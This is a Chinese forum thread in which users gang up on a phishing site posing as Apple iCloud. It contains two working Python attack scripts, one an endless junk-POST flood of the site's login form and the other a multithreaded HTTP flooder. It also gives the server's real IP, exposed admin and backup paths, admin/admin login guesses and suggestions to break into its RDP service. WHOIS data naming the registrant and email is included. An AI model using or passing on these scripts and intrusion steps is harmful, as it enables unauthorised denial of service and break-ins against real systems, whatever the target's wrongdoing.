搞搞这帮小贼。。。

这些网站不需要备案的吗

@goodniuniu 不知道啊，不过刚才查了下，没有备案信息。。。。。。

如果你不知道怎么搞，就试着写个脚本提几十万垃圾数据到他们数据库

@goodniuniu 大陆地区才有备案一说。。。

@stillwaiting 关键是这个是 CN 域名啊。。。

昨天在新网注册的域名，服务器在香港，没有备案信息， QQ 应该是小号。

```
所有者 蒋立平
Registrant Name

所有者联系邮箱 [email protected]
Registrant E-mail

注册商 北京新网数码信息技术有限公司
Sponsoring Registrar

注册日期 2017 年 01 月 07 日
Registration Date(UTC+08:00)

到期日期 2018 年 01 月 07 日
Expiration Date(UTC+08:00)

此域名到期日仅供参考。实际到期日期请咨询其注册商。
如未在实际到期日期前续费，将导致域名使用异常，如网站无法访问等。

域名状态
Domain Status 正常状态（ ok ）

DNS 服务器
Name Server DNS1 ： ns11.xincache.com
DNS2 ： ns12.xincache.com

118.184.45.161
香港 安畅网络(亚太)有限公司沙田数据中心(沙田火炭竹洋街 8 号新基物流中心 3 楼)
```

@daolin998 cncn 域名也可以不备案解析的。

这种网站可以去举报。

cn 域名是要实名注册的 不过这资料应该拿不到的...

瓜子汽水鸡块辣条
小板凳

cn 要备案，所以就弃了

关了。 DNS 解析去掉了

…@feather12315
我的错，没关

整个上千万的数据，撑死他的服务器

看看这个 url http://www.apple-icloudc.cn/backup/

结果是 403 啊，说明目录存在，很有搞头，谁去用工具爆破一下这个目录。。。

而且是用 《逆风工作室 Netbox v3.0 201005 》 做的。。看看有没有什么漏洞

欢迎去阿里 110 举报，避免他人财产损失

@daolin998 cn 域名不用国内的主机不需要备案

记得有个帖子说也是遇到这种，然后他就写了个脚本 post 一堆垃圾数据，还扫描到了 100 多个同类型的网站，之后就忘了
我也遇到类似的盗号的，我的做法是往那个页面发十万还是一百万（ 0 没得数 XD ）条垃圾信息，结果第二天就关站了

后台 http://www.apple-icloudc.cn/manager/

然后搜了一下所谓紫缘管理系统，应该是专门做钓鱼网站的

去举报一下这个网站吧
https://www.quora.com/Phishing-Where-can-we-report-rogue-websites-Globally-and-not-locally-to-a-police-station/answer/Du-Song?srid=uBRi

@daolin998 备案是接入环节的事情，域名本身无备案的说法。虽然确实叫域名备案，实际审核的是接入服务提供商

# language: python


def post():
url = 'http://www.apple-icloudc.cn/IPASS.asp'
data = dict(sjname=123,
sjpass=123,
submit='登录')
headers = {'Cookie': 'PWSBMJSDSUIPPUOMDATL=OXVIFWPVJALCSXQNBGYOKCMAUQLNROTEDYSJIMEY',
'Origin': 'http://www.apple-icloudc.cn',
'Referer':'http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ',
}
req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), headers=headers)
page = urllib.request.urlopen(req).read().decode('gbk')
print(page)

def post():
url = 'http://www.apple-icloudc.cn/IPASS.asp'
headers = {'Cookie': 'PWSBMJSDSUIPPUOMDATL=OXVIFWPVJALCSXQNBGYOKCMAUQLNROTEDYSJIMEY',
'Origin': 'http://www.apple-icloudc.cn',
'Referer':'http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ',
}
i = 0
while 1:
i += 1
data = dict(sjname=i,
sjpass=i,
submit='登录')
req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), headers=headers)
page = urllib.request.urlopen(req).read().decode('gbk')
print(page)

if __name__ == '__main__':
post()

怎么就被搞挂了....

这个网站现在已经没法访问了。

哈哈，程序员不好惹

好像，那个网站有 cdn ， 跑死了就没戏了，慢慢跑，跑流量 1T 300 元，可以跑到小贼破产啊 ～～～～

import urllib
import urllib2
import threading
import time

print 'ctrl and z stop the program'
thr=input("how many thread do you need : (the thread should be lower then 10 , otherwise gg)")
cycle=input ("how many cycle do you need : ")
address= raw_input("plaese input the address")
start = time.clock()

def printf(i):
for x in xrange(cycle):
down(x)
end = time.clock()
print ' ' + 'T' + i + " " +"using: %f s" % (end - start)


def down(x):
url = (address)
d=urllib2.urlopen(url)
data = d.read()
print x,

def test():
thread_list = []
for i in xrange(thr):
sthread = threading.Thread(target = printf, args = str(i))
sthread.start()
thread_list.append(sthread)

if __name__ == '__main__':
test()

@wlh233 紫缘是专门做钓鱼网站卖给别人的，几年前的 qq 钓鱼网站也是他们的杰作

@dikT
@hrong
停止解析了，不过还可以通过原 IP 118.184.45.161 继续 POST

据相关报道称，这个紫缘的作者早被抓了？

取消解析了而已，源站 ip 118.184.45.161 ，后台管理 http://118.184.45.161/manager/

http://118.184.45.161/backup/

@vizards 你真快
admin
admin
admin

@pudgeee
http://118.184.45.161/manager/admin.asp

这个早就被人搞过了，某乎上相关文章

IP 是 51idc 的，去举报呗

为什么我手机端的 V2EX 不能发表主题

这应该是一条黑色产业链
有人专门偷手机有人专门钓鱼
这种钓鱼网站在手机浏览器比如 safari 是不会提示的，在 pc 上 360 会提示（之前上过当，输过密码，然后几个苹果设备的数据都被抹了。。

厉害了，表哥们

苹果手机都是这一套产业链。偶尔还会以假的苹果客服给你打电话。前面没有上海的区号。不行就发钓鱼信息，钓鱼邮件来骗取 appleid

@assassinpig 点击一次登陆 然后 重新访问这个地址就能进后台 是漏洞？

喂，已经被玩坏了！

沙田 上次有个骗子给我发短信，网站就是放沙田的，二话不说打了他 3 天，然后删站

完全挂掉了~

强 完全挂掉了

已经被玩儿坏

我错过了各位大佬的好戏

@LGA1150 死掉了。。

长时间不上当骗子会冒充客服打电话，如果是 qq 邮箱的话会加你的 qq

可啪

效率好快啊。。

点个赞

@dikT 厉害了，哥

好不容易找到个可以玩的 这么快就被玩坏了 你们不能温柔点么。。

来晚了 没得玩了

没得玩了

@Livid 以后对这类好玩的东西，期待能搞个订阅＋邮件提醒功能。哈哈

我也想玩玩的。没想到已经被你们玩坏了。

并没有来晚，只是任务升级了

服务器还活着，骗子应该是换了个域名绑定上接着骗其他人去了。
$ curl -I 118.184.45.161
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 1193 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0HTTP/1.1 200 OK
Content-Length: 1193
Content-Type: text/html
Content-Location: http://118.184.45.161/iisstart.htm
Last-Modified: Fri, 21 Feb 2003 12:15:52 GMT
Accept-Ranges: bytes
ETag: "0ce1f9a2d9c21:c4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 Jan 2017 00:08:19 GMT

不是做安全的并不清楚除了 dos/ddos 还能做啥，该怎么折腾楼下继续

你们玩儿得太快了吧。。。

干得漂亮！！！

118.184.45.161 ， ping 了一下，速度还挺快。端口扫描，开放了 80 、 3389 端口。既然开放了 3389 远程桌面端口，远程上去先看一下，服务器是 Win server 2003 ，相信各种漏洞补丁打的可能性不高，那接下来就去网上找 3389 入侵案例咯。我相信他的用户名是 administrator 。接下里看楼主的了。

会不会连 IP 都更换了？

哈哈哈， 666666.
惹怒了一群程序员..笑死我了

你们，哈哈哈～这种就应该狠狠的玩！

其实程序员才是真黑客

应该 118.184.45.161 118.184.45.162 这两台都是属于这个骗子的，安装的操作系统都是一样的。

@assassinpig 多谢多谢。。
@huiyue 多谢多谢。。 这就去看案例……
@all 多谢各位了， 这肯定是一个黑色产业链，手机丢失后不到一天就进入诈骗环节，那说明小贼已经销赃完，说不准都往下走了几个环节了，说明这个流程很成熟，只是有些人不管罢了。。。 那。。。。 只能自食其力喽。。。

@daolin998 cn 域名不一定要备案，但买到后会有个实名审核的过程，反正我的全没备案，就只作了实名。

@Wins0n 已经按照你的信息 报沈阳市刑警指挥中心备案 多谢！

@wolfan 阿里云 cn 域名好像不需要备案也

楼上的禽兽 这么快就给玩完了

@via 不管哪里注册的 cn 域名都需要上传实名信（身份证照片等）息审核后才能解析

已经玩坏了啊。。

@pudgeee 最可怕的是某些人也参与了。。。

可怕-- ！！！！！

登录不了。。谁知道服务器密码的？远程连接桌面，不知道密码。

你们太强了

早知道 V2EX 上大家这么厉害 去年丢手机时候也发上来让大家玩玩好了

iis6 各位可以试试看玩玩

看着大家玩的这么开心,我说一句吧.
其实你们这样搞钓鱼网站,对他们没什么大影响,post 垃圾数据更是一点用都没有,我找到几个大量 post 的 ip,直接一个 sql 命令就删了,顺便把你 ip 封了.

域名不值钱,一天换 10 个域名都挠痒痒
至于 DDos,叫机房换个 ip 就行了,一天 500 块钱的成本对于钓鱼者来说,都是预算内.

技术角度是打不倒钓鱼的,除非是根源切除整个产业链.

@huiyue 162 这个居然还在开机， mstsc 都还能连得上。只可惜不知道密码啊